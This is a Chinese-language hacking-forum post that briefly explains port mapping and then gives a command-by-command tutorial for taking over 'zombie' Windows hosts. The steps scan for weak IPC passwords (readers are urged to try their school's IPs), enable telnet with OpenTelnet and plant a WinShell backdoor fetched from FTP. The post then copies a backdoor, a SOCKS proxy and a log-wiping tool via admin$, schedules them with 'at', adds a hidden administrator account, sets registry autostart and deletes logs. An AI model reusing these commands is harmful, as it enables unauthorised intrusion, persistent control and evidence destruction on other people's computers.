昨天的帖子发表后,很多朋友问了很多问题,我发现很多朋友对基本的网络命令还很生疏,请你看这个帖子,里面讲的很详细的[url]http://www.91one.net/dvbbs/dispbbs.asp?boardID=14&ID=403[/url]
有个朋友问了我个问题:端口映射是什么意思??
其实很简单的,采用端口映射(Port Mapping)的方法,可以实现从Internet到局域网内部机器的特定端口服务的访问。例如,你所使用的机子处于一个连接到Internet的局域网内,你在机子上所开的所有服务(如FTP),默认情况下外界是访问不了的。这是因为你机子的IP是局域网内部IP,而外界能访问的只有你所连接的服务器的IP,由于整个局域网在Internet上只有一个真正的IP地址,而这个IP地址是属于局域网中服务器独有的。所以,外部的Internet登录时只可以找到局域网中的服务器,那你提供的服务当然是不起作用的。
所以解决这个问题的方法就是采用PM了。
有篇文章不错。大家看看:[url]http://www.pconline.com.cn/pcedu/soft/lan/jywgl/10301/127157.html[/url]

 
继续讲,昨天有人说我找到个肉鸡,但不会用远程控制软件。先说用什么好呢
我推荐Remote Administrator,有篇介绍它的文章很好:[url]http://www.pcworld.com.cn/2002/back_issues/2205/0533e.asp[/url]
下载:[url]http://www.skycn.com/soft/15592.html[/url]
我想里面的说明你应该能很好理解的
 
现在我以一个例子来说一下怎么获得一个肉鸡,虽然前面一直在说,但好象有点乱的,下面说的这个有点投机取巧的感觉,至少我这样觉得,不过因为很多朋友说都5天了,我什么都没搞到啊,所以只能。。

第一步:扫描弱口令
这里我用20cn开发的scanipc (这[url]http://down.yqdown.com/xdown/yqdown0316/scanipc.rar[/url]有下的)
不一会就会扫到很多有弱口令的主机
(你可以拿你们学校的IP试试)

这里我用opentelnet(远程启动TELNET的小东西,这里下:[url]http://www.infosw.com/down/software.asp?id=1520[/url])给扫描到开了空口令的主机开个端口让我们telnet连接上去
,开了23端口,并可以连接上的主机就不用进行次步骤了!
Opentelnet使用方法:
OpenTelnet.exe \\server <帐号> <密码> <NTLM认证方式> <Telnet端口>
列如:
C:\>OpenTelnet.exe \\192.168.1.2 administrator 123456 1 90 用户名:administrator 密码:123456
NTLM认证方式:1(也可以选择0请自己测试) 开的端口:90
运行完,如果屏幕上出现 Disconnecting server...Successfully! 就说明已经成功。
这样,我们就能够得到一个开90端口的Telnet服务器了。

Telnet 192.168.1.2 90
这样就可以登录上去了。

第三步:配置并安装后门程序
这里我选择WinShell(小巧精干我喜欢下载:[url]http://www.hktk.com/soft/soft_server/winshell.html[/url]),用winshell主程序设置好后门,然后把后门程序传到台FTP空间上!
列如:
c:\>ftp
ftp>open[url]www.cnwill.com[/url]
然后输入用户名字 密码把后门传上去mput c:\cnwill.exe
现在我们登陆到肉鸡上 Telnet 192.168.1.2 90
把刚上传的后门程序下载并运行(别忘记删除 后门程序)
『后门也可以用net命令完成』

net user \\192.168.1.2 90\ipc$ "" /user:"administrator"
[ 建 立 IPC$ 连 接 ]

copy d:\zilong.exe \\192.168.1.2 90\admin$\system32
[ 上 传 一 个 后 门 程 序 到 对 方 的 主 机 里]

copy d:\long.exe \\192.168.1.2 90\admin$\system32
[上 传 一 个 删 除 日 志 程 序 到 对 方 的 主 机 里]

copy d:\scoks.exe \\192.168.1.2 90\admin$\system32
[ 上 传 一 个 SCOKS 代 理 程 序 到 对 方 的 主 机 里]

copy d:\zilong.reg \\192.168.1.2 90\admin$\system32
[上 传 导 入 注 册 表的 REG 文 件 到 对 方 的 主 机 里]请看后门说明

net time \\192.168.1.2 90
[ 得 到 对 方 主 机 的 当 前 时 间]

at \\192.168.1.2 90 13:20 zilong.exe
[用 a t命 令 执 行 我 们 的 后 门 程 序] 别 把 时 间 搞 错 了 哦

==============
如果大家用不习惯命令的话,那就用流光的IPC种植者吧,简单易用.这里就不赘述啦
=============

telnet 192.168.1.2 90
[ 从 我 们 设 置 的 后 门 程 序 登 陆 主 机 ]

net user  ****  /add
[近来后添加一个用户名再说或者也可以选择激活guest]

net localgroup administrators ****  /add
[ 把 自 己 添 加 到 管 理 组 里,这 样 我 们 就 是 超 级 管 理 员 了]

regedit /s c:\winnt\system32\zilong.reg
[ 把 后 门 程 序 导 入 注 册 表 的 启 动 项]这样做是防止被别人停止我们
的后门服务程序,就算我们的后门服务程序被停止了,在主机重启动后我们的后门
服务就又继续运行了.

SOCKS -install
[ 开 始 安 装 socks 代 理]

SCOKS -config starttype 2
[ 使 SOCKS 代 理 程 序 自 动 运 行,不 怕 肉 鸡 再 重 启 了]

socks -config port 1080
[ socks 代 理 端 口 设 置 为 1080 ]

net start skserver
[ 启 动 SOCKS 代 理 服 务 ]可以打开QQ设置IP代理了

long
[ 刚 才 上 传 的 一 个 删 除 日 志 程 序,运 行 它 就 可 以 了]